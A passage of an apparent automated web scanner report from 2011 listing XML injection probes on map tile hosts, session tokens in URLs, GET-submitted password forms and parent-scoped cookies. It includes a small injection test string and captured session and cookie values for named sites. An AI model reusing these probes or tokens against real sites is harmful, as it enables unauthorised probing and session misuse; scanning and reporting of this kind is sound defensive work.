The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt1.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt1.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt1.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:06 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt2.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt2.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt2.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt2.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:22 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt3.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt3.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt3.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt3.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:11 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7. Session token in URL
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://simplexityllc.tt.omtrdc.net
Path:   /m2/simplexityllc/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/simplexityllc/mbox/standard?mboxHost=phones.microsoftstore.com&mboxSession=1310993867366-231308&mboxPage=1310993867366-231308&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxCount=1&referringdomain=microsoft&refcode1=&refcode2=&eid=&agent=&zipcode=98001&oflag=specialoffer&mbox=phoneFinder_phones_filter_phones&mboxId=0&mboxTime=1310975882554&mboxURL=http%3A%2F%2Fphones.microsoftstore.com%2FeCommerce%2FSpecialOffer.aspx%3Fcid%3D36173_98658c3dff8d4f2da6bfa1b480f50ef7&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: simplexityllc.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx?cid=36173_98658c3dff8d4f2da6bfa1b480f50ef7

Response

HTTP/1.1 200 OK
Content-Length: 113
Date: Mon, 18 Jul 2011 12:57:55 GMT
Server: Test & Target

mboxFactories.get('default').get('phoneFinder_phones_filter_phones',0).setOffer(new mboxOfferDefault()).loaded();

7.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310993870949-319721&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&loggedin=false&mbox=VZW_Global_Header&mboxId=0&mboxTime=1310975870964&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3F%26item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 12:57:47 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 1026
Date: Mon, 18 Jul 2011 12:57:46 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('VZW_Global_Header',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

7.3. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx?id=1685&np=1569-1684-1536-1537-1538-1568-1690-1685&WT.mpe=oHP-car

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:57:36 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=179-9570509-7108862; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 12:57:36 GMT; Path=/
Content-Length: 111404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
   <title>Ama
...[SNIP]...
<span id="popup_path">
<a href="/redirect/ref=cr_page_write_review?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Freview%2Fcreate-review%3Fasin%3DB00528E2JU&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83">
<input type="image" src="http://g-ecx.images-amazon.com/images/G/01/Aloha/en_US/inca/buttons/create-review-btn-1586590642._V174067908_.gif" height="22" width="157" border="0" />
...[SNIP]...

7.4. http://www.bestbuy.com/site/olspage.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bestbuy.com
Path:   /site/olspage.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /site/olspage.jsp;jsessionid=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28?id=pcat17408&width=400&skuID=2330093&isCntrctSelect=false&productId=1218323066904&contractDesc=&TB_iframe=true&isDevicePDP=true&type=page&documentType=mobile&parentPage=PDP&modal=true&keepThis=true&height=250 HTTP/1.1
Host: www.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p?id=1218323066904&skuId=2330093&st=htc%20trophy&cp=1&lp=1&contract_desc=
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; akaau=1310995660~id=1ba8cb2e676cea6446c2d3ded776fcfc; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993883922

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
X-Powered-By:
Vary: Accept-Encoding
Expires: Mon, 18 Jul 2011 12:57:58 GMT
Pragma: no-cache
Date: Mon, 18 Jul 2011 12:57:58 GMT
Content-Length: 4044
Connection: close
Cache-Control: no-store

<!DOCTYPE html>
<!-- B:226 -->
<!-- B:005 -->
<!-- bbolsp-app05/dlpolsapp28-40-11-6 -->
<!-- E:005 -->
<!-- B:0OD -->
<!-- B:185 -->
<script type="text/javascript" language="javascript">
document.doma
...[SNIP]...

7.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=131551933524460&app_id=131551933524460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbc6876fe3cf96%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e2456f94ef%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e64f41ed3eee2%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29c11306e746b8%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11952281f410d%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.183.31
X-Cnection: close
Date: Mon, 18 Jul 2011 13:01:38 GMT
Content-Length: 278

<script type="text/javascript">
parent.postMessage("cb=f29c11306e746b8&origin=http\u00253A\u00252F\u00252Fwww.verizonwireless.com\u00252Ff375df477b7f832&relation=parent&transport=postmessage&frame=fa8
...[SNIP]...

8. Password field submitted using GET method
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

8.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

8.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

9. Cookie scoped to parent domain
There are 20 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://blog.domaintools.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=b56d089b9b5d752fed33fda40c6cb1b5; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 119306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
